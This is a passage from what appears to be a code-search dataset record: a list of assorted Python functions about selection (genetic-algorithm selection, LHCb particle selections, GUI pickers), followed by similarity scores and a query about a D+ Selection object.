2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def fitness_proportional_selection(self) -> List[Character]:\n print(' - selection')\n st = time.time()\n\n # open pool the the amount of cpu cores\n pool = mp.Pool(mp.cpu_count())\n\n # create a character at each position of the characters list\n new_list = pool.map(create_character, [i for i in self.characters])\n\n # close pool and release the cores\n pool.close()\n\n self.characters = new_list\n self.get_diversity()\n self.calc_sum_fitness()\n self.calc_average_fitness()\n self.get_best_fitness()\n self.get_worst_fitness()\n\n # create the wheel as dict with the selection chance and the character\n wheel: Dict[float, Character] = {}\n\n # the new generation\n new_generation: List[Character] = []\n fit_c_generation: float = 0\n new_wheel = {}\n \"\"\"get the chance of all characters to be selected\n \n \"\"\"\n for c in self.characters:\n p_chance = c.fitness / self.sum_fitness\n chance = p_chance * self.size\n s = str(chance)\n s = s.split('.')\n r = int(s[0])\n f_c = '0.' + s[1]\n f_c = float(f_c)\n fit_c_generation += f_c\n if r <= 0:\n wheel[f_c] = c\n while r > 0:\n new_character = copy.deepcopy(c)\n new_generation.append(new_character)\n r -= 1\n\n for k, v in wheel.items():\n new_key = (k / fit_c_generation) * self.size\n new_wheel[new_key] = v\n\n while len(new_generation) < self.size:\n for k in sorted(new_wheel, reverse=True):\n chance = random.uniform(0, fit_c_generation)\n if chance <= k:\n new_character = copy.deepcopy(new_wheel[k])\n new_generation.append(new_character)\n if len(new_generation) >= self.size:\n break\n continue\n e = time.time()\n print(\" - time: \", e - st)\n\n return new_generation", "def select(self):\n\n return self.p[0], self.p[1]", "def __init__(self, k, p, sample_p=1):\n # Maximum sample size\n self.k = k\n\n # A dictionary containing the sampled elements\n # The dictionary key is the key of the element\n # The value is a tuple (seed, count)\n self.elements = {}\n\n # The function of the frequencies that the sketch estimates\n # For now it's the p-th frequency moment, but in the future we may\n # support other functions (passed as a parameter)\n self.func_of_freq = lambda x: x**p\n\n # The power of values used for the sampling weights\n self.sample_p = sample_p", "def selection(probs):\n # pick 2 parents out of this distribution\n t = [i for i in range(len(probs))]\n draw = choice(t, 2, p=probs, replace=False)\n return draw", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = 
DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def project(record, selected, pkey_name) -> StateDictInterface:\n if selected:\n keys = set(selected.keys()) | {pkey_name}\n return record.projection(keys)\n else:\n return record", "def select(self):\n pass", "def select(self):\n pass", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def pions ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n if self['NOPIDHADRONS'] :\n from StandardParticles import StdAllNoPIDsPions as inpts\n pioncut = self['PionCut']\n else :\n from StandardParticles import StdAllLooseANNPions as inpts\n pioncut = \"(%s)&(%s)\" % ( self['PionCut'] , self['PionPIDCut'] ) \n ##\n return self.make_selection (\n 'Pion' ,\n FilterDesktop ,\n [ inpts ] ,\n Code = pioncut ,\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def upsilon_pK ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n #\n return self.make_selection (\n 'Y&pK' ,\n DaVinci__N3BodyDecays ,\n [ self.upsilons() , self.protons() , self.kaons() ] ,\n ## algorithm properties \n DecayDescriptor = \"[Upsilon(4S) -> J/psi(1S) p+ K-]cc\" ,\n Combination12Cut = \"\"\"\n ( AM < 15 * GeV ) &\n ( ACHI2DOCA(1,2) < 16 )\n \"\"\" ,\n CombinationCut = \"\"\"\n ( AM < 15 * GeV ) &\n ( AM23 < 2000 * MeV ) & \n ( ( AM - AM1 - AM23 ) < 2.5 * GeV ) &\n ( ACHI2DOCA(1,3) < 16 ) &\n ( ACHI2DOCA(2,3) < 16 )\n \"\"\" ,\n MotherCut = \" chi2vxndf< 10 \" ,\n )", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return 
self.base_model(best_num_components)", "def select(self):\r\n pass", "def select_item(items, weights, k):\n x = random.choices(items, weights=weights, k=k)\n return x", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def choose(self, g, c, p):\n ng = copy.deepcopy(g)\n ng[c[0]][c[1]] = p\n return ng", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def _gen_qiskit_gateset(q_circ):\n return {\n 'H': q_circ.h,\n 'X': q_circ.x,\n 'Y': q_circ.y,\n 'Z': q_circ.z,\n 'SWAP': q_circ.swap,\n 'I': q_circ.iden,\n 'S': q_circ.s,\n 'D-S': q_circ.sdg,\n 'T': q_circ.t,\n 'D-T': q_circ.tdg,\n 'RX': q_circ.rx,\n 'RY': q_circ.ry,\n 'RZ': q_circ.rz,\n 'C-H': q_circ.ch,\n 'CNOT': q_circ.cx,\n 'C-Y': q_circ.cy,\n 'CSIGN': q_circ.cz,\n 'C-RZ': q_circ.crz,\n 'CCNOT': q_circ.ccx,\n 'C-SWAP': q_circ.cswap,\n 'U': q_circ.u3,\n 'U3': q_circ.u3,\n 'U2': q_circ.u2,\n 'U1': q_circ.u1,\n 'U0': q_circ.iden,\n 'PH': q_circ.rz,\n 'RXX': q_circ.rxx,\n 'RZZ': q_circ.rzz,\n 'R': q_circ.r,\n 'MS': q_circ.ms\n }", "def selectVertex(self, addToSelection: bool) -> None:\n ...", "def new_piece(self):\n piece_type = pieces.PieceSelector.select_random_piece()\n return piece_type(game_config.NEXT_PIECE_POSX, game_config.NEXT_PIECE_POSY)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 
1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def select(self):\n return", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def upsilons ( self ) :\n ##\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n return self.make_selection (\n 'Upsilon' ,\n FilterDesktop , \n [ self.dimuon () ] , \n ## algorithm parameters \n Code = self['UpsilonCut'] ,\n ## \n ReFitPVs = True\n ##\n )", "def selection(population: list, weights: list):\n\n new_population = list()\n\n for individual in population:\n new_population.append(individual[1])\n\n individuals = choices(new_population, weights=weights, k=2)\n\n return individuals[0], individuals[1]", "def generatePDI(self,level='species',type='richness'):\n if type == 'richness':\n import biodiversity.richness as rich\n pdi = rich(self)\n try:\n return pdi[level]\n except:\n logger.error(\"[biospatial.gbif.taxonomy.distanceToTree] level selected non existent (used %s)\" %level)", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. 
The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def _getAsSelection(self):\n return self._asSelection", "def New(*args, **kargs):\n obj = itkThresholdSegmentationLevelSetImageFilterID2ID2D.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def select_operator(operators, weights, rnd_state):\n return rnd_state.choice(np.arange(0, len(operators)),\n p=weights / np.sum(weights))", "def partition_selection():\n if selection is None:\n warning(\"You need to pick something first.\")\n return\n if not selection.obj_type in ['actor','element']:\n warning(\"You need to pick actors or elements.\")\n return\n for A in GD.canvas.actors:\n if not A.atype() == 'TriSurface':\n warning(\"Currently I can only partition TriSurfaces.\" )\n return\n partitionCollection(selection)\n highlightPartitions(selection)", "def __init__(self, selected_points, cut_depth, cut_breadth):\n\n\n self.cut_depth = cut_depth\n self.cut_breadth = cut_breadth\n\n self.points = selected_points\n\n self.vline = self.vlinecomp()\n self.hline = self.ortho_line_cut()\n\n self.mid_left = self.midpoint(0,1)\n self.mid_right = self.midpoint(2, 3)", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def getselected_nodes(self):\n self.selected_nodes = {}\n for path in self.options.selected_nodes:\n sel_data = path.rsplit(':', 2)\n path_id = sel_data[0]\n sub_path = int(sel_data[1])\n sel_node = int(sel_data[2])\n if path_id not in self.selected_nodes:\n self.selected_nodes[path_id] = {sub_path: [sel_node]}\n else:\n if sub_path not in self.selected_nodes[path_id]:\n self.selected_nodes[path_id][sub_path] = [sel_node]\n else:\n self.selected_nodes[path_id][sub_path].extend([sel_node])", "def get_selection(self, name):\n print 'hi being selected in plotdata'\n return self.selections.get(name, None)", "def __init__(self, cols, center, radius):\n ColorSelection.__init__(self, cols, center, radius)", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def 
__init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def selectAdd(op):\n doc = op.GetDocument()\n doc.SetActiveObject(op, c4d.SELECTION_ADD)", "def selection(self):\n\n # sort the generation according to fitness.\n self.sortByFitness()\n # get the fitness sum.\n fitnessSum = 0\n for outfit in self.currentGeneration:\n fitnessSum += self.applyFitness(outfit)\n # generate a random number\n stop = random.uniform(0, 1)\n accumulated = 0\n offset = 0\n for outfit in self.currentGenerationSorted:\n fitness = self.applyFitness(outfit) + offset\n probability = fitness / fitnessSum\n accumulated += probability\n\n if stop <= accumulated:\n return outfit", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def survivors_selection(self):\n q = 5\n new_population = []\n for i in range(self._population_size):\n batch = []\n for j in range(q):\n r = random.randint(0, (self._child2population_ratio + 1) * self._population_size - 1)\n if r < self._population_size:\n batch.append(self._population[r])\n else:\n batch.append(self._children[r - self._population_size])\n new_population.append(self.select_best(batch))\n\n self._population = new_population", "def selection(self):\r\n if not self._selection:\r\n print(\"not working\")\r\n return None\r\n\r\n year, month = self._date.year, self._date.month\r\n if len(str(month))==1:\r\n month = \"0{}\".format(month)\r\n return (\"{}{}{}\".format(year, month, self._selection[0]), \r\n \"{} / {} / {}\".format(year, month, self._selection[0]))", "def selection(self, name):\n try:\n return self._selections[name]\n except KeyError:\n raise Pype9NameError(\n \"No selection named '{}' (possible '{}')\"\n .format(name, \"', '\".join(self.selection_names)))", "def New(*args, **kargs):\n obj = 
itkThresholdSegmentationLevelSetImageFilterID3ID3D.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def addSelectedToCanvas(self):\n\n selected = self.moduleList.currentItem()\n module = selected.data(QtCore.Qt.UserRole)[0]\n\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n # get inst\n modType = cmds.getAttr(module + \".moduleType\")\n modName = cmds.getAttr(module + \".moduleName\")\n mod = __import__(\"RigModules.\" + modType, {}, {}, [modType])\n reload(mod)\n\n # get the class name from that module file (returns RigModules.ART_Root.ART_Root for example)\n moduleClass = getattr(mod, mod.className)\n\n # find the instance of that module\n moduleInst = moduleClass(self, modName)\n self.modules.append(moduleInst)\n\n scene = self.getCurrentCanvasTab()\n\n # find out if charNode has a namespace\n if cmds.objExists(characterNode + \".namespace\"):\n namespace = cmds.getAttr(characterNode + \".namespace\") + \":\"\n else:\n namespace = \"\"\n\n # pass in the network node and the namespace\n picker = moduleInst.pickerUI(scene.sceneRect().center(), self.pickerUI, module, namespace)\n scene.addItem(picker[0])\n self.pickerUI.selectionScriptJobs.append(picker[2])\n\n # =======================================================================\n # #mirror the module's pickerBorderItem if needed\n # =======================================================================\n if picker[1] == True:\n picker[0].setTransformOriginPoint(picker[0].boundingRect().center())\n picker[0].setTransform(QtGui.QTransform(-1.0, 0.0, 0.0, 1.0, picker[0].boundingRect().width() * 2, 0.0))\n\n children = picker[0].childItems()\n if children is not None:\n self.mirrorChildren(children)\n\n row = self.moduleList.row(selected)\n self.moduleList.takeItem(row)", "def choices(symbols, k):\n return [R.choice(symbols) for _ in range(k)]", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def pi(self):\n return self(self._real_field().pi())", "def select(self, test):\n survivors = []\n for particle in self.particles:\n # Find the originating particle\n parent = particle\n while parent.origin is not None:\n parent = parent.origin.initial_state[0]\n if test(parent, particle) is True:\n survivors.append(particle)\n return ParticleCollection(survivors)", "def __init__(self, k=1):\n self.k = k\n self.x = None\n self.y = None\n self.classes_ = None", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n 
Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def _write_selec(parameters):\n # Load data\n from ._common import selections\n\n data = deepcopy(selections)\n if parameters[\"selections\"][\"integers\"]:\n data[\"integers\"].update(parameters[\"selections\"][\"integers\"])\n if len(parameters[\"selections\"][\"floats\"]):\n data[\"floats\"] = parameters[\"selections\"][\"floats\"]\n\n # Check floats and overwrite IE(1)\n if data[\"floats\"] is not None and len(data[\"floats\"]):\n if isinstance(data[\"floats\"][0], (list, tuple, numpy.ndarray)):\n for x in data[\"floats\"]:\n if len(x) > 8:\n raise ValueError()\n\n data[\"integers\"][1] = len(data[\"floats\"])\n ndim = 2\n\n else:\n if len(data[\"floats\"]) > 8:\n raise ValueError()\n\n data[\"integers\"][1] = 1\n ndim = 1\n else:\n ndim = None\n\n # Formats\n fmt = block_to_format[\"SELEC\"]\n fmt1 = str2format(fmt[1])\n fmt2 = str2format(fmt[2])\n\n # Record 1\n values = [data[\"integers\"][k] for k in sorted(data[\"integers\"].keys())]\n out = write_record(values, fmt1)\n\n # Record 2\n if ndim == 1:\n out += write_record(data[\"floats\"], fmt2)\n elif ndim == 2:\n for x in data[\"floats\"]:\n out += write_record(x, fmt2)\n\n return out", "def ImagePointPicker(img, pts = 4, **kwargs):\n\timgpicker = __ImgPicker(img, pts, **kwargs)\n\treturn imgpicker.pickedPoints", "def pairing_group_create(curve='MNT224'):\n return PairingGroup(curve)", "def _selection(self, evaluations, selection, method=\"truncated\", best_rate=0.2):\n\n if selection:\n end_range_for_parents = max(1, int(self.population_size * best_rate))\n evaluations_sorted = torch.sort(evaluations)\n population_sorted = self.population[evaluations_sorted[1]]\n\n if self.best_individual is None:\n self.best_individual = population_sorted[0]\n self.best_eval = evaluations_sorted[0][0]\n elif self.best_eval > evaluations_sorted[0][0]:\n self.best_individual = population_sorted[0]\n self.best_eval = evaluations_sorted[0][0]\n best_population = torch.zeros([end_range_for_parents, len(self.population[0])], device=self.device)\n if method == \"truncated\":\n \"\"\"\n returns best individuals\n \"\"\"\n best_population = population_sorted[:end_range_for_parents]\n elif method == \"fitness_based\":\n \"\"\"\n probability of each individual to be selected is proportional to its fitness value\n \"\"\"\n tot = sum(evaluations)\n probabilities = evaluations / tot\n for i in range(end_range_for_parents):\n best_idx = torch.distributions.categorical.Categorical(\n probabilities.clone().detach()).sample()\n best_population[i] = self.population[best_idx]\n # avoid repetitions\n probabilities[best_idx] = 0\n elif method == \"rank_based\":\n \"\"\"\n probability of each individual to be selected is proportional to its rank value\n \"\"\"\n tot = ((1 + len(evaluations)) / 2) * len(evaluations)\n ranks = torch.linspace(1, len(evaluations), steps=len(evaluations), device=self.device)\n sorted_probabilities = 1 - ranks / tot\n for i in range(end_range_for_parents):\n best_idx = torch.distributions.categorical.Categorical(\n sorted_probabilities).sample()\n best_population[i] = population_sorted[best_idx]\n # avoid repetitions\n sorted_probabilities[best_idx] = 0\n if self.elitism:\n best_population[end_range_for_parents - 1] = self.best_individual\n else:\n best_population = 
self.population\n return best_population", "def legalize_Select(optree):\n cond = optree.get_input(0)\n op0 = optree.get_input(1)\n op1 = optree.get_input(2)\n precision = optree.get_precision()\n if precision is None:\n Log.report(Log.Error, \"None precision for Select:\\n{}\", optree)\n if op0.get_precision().get_bit_size() != precision.get_bit_size():\n optree.set_input(\n 1,\n Conversion(\n op0,\n precision = precision\n )\n )\n if op1.get_precision().get_bit_size() != precision.get_bit_size():\n optree.set_input(\n 2,\n Conversion(\n op1,\n precision = optree.get_precision()\n )\n )\n return optree", "def pkj1pk(self,r,z=0):\n return M.sqrt(M.pi/2.0)/r*self.besselInt.besselInt(lambda k: self.delta(k/r, z)/M.sqrt(k),1.5,self.besselN,self.besselh)", "def get_computers_choice():\n choices = ['Rock', 'Paper', 'Scissors']\n choice_index = randint(0, 2)\n choice = choices[choice_index]\n return choice" ]
[ "0.656367", "0.60201555", "0.57468003", "0.55250317", "0.55029947", "0.54665506", "0.53652567", "0.5354767", "0.5222274", "0.52220505", "0.51531583", "0.51516193", "0.5116602", "0.50792444", "0.5024644", "0.5015439", "0.5015241", "0.49948704", "0.49836156", "0.49750015", "0.4951771", "0.49449685", "0.4906584", "0.48983282", "0.48919162", "0.4881866", "0.48805493", "0.48796737", "0.4878966", "0.4870896", "0.4869406", "0.48576924", "0.48564172", "0.48269144", "0.48269144", "0.48207635", "0.4819919", "0.48023215", "0.4798266", "0.47969383", "0.4794351", "0.47862366", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47808602", "0.47753075", "0.47624794", "0.47552288", "0.47283903", "0.47145227", "0.4709548", "0.4709375", "0.47060424", "0.4697647", "0.46929917", "0.4691896", "0.46908948", "0.46864256", "0.4680707", "0.46544144", "0.4650397", "0.46420047", "0.4638613", "0.46379852", "0.46322453", "0.46207172", "0.46131504", "0.46101162", "0.4609979", "0.46062496", "0.46039546", "0.45991406", "0.45958832", "0.4595597", "0.45926937", "0.45913664", "0.4581859", "0.45817038", "0.4581605", "0.45802715", "0.4577448", "0.45723152", "0.45706654", "0.4566401", "0.45637488", "0.45570725", "0.45476562", "0.45474976", "0.45405734", "0.45391718", "0.45374203", "0.45328453", "0.45306256", "0.45269525", "0.45229387" ]
0.0
-1
Create and return a D+ > D pi+ Selection object.
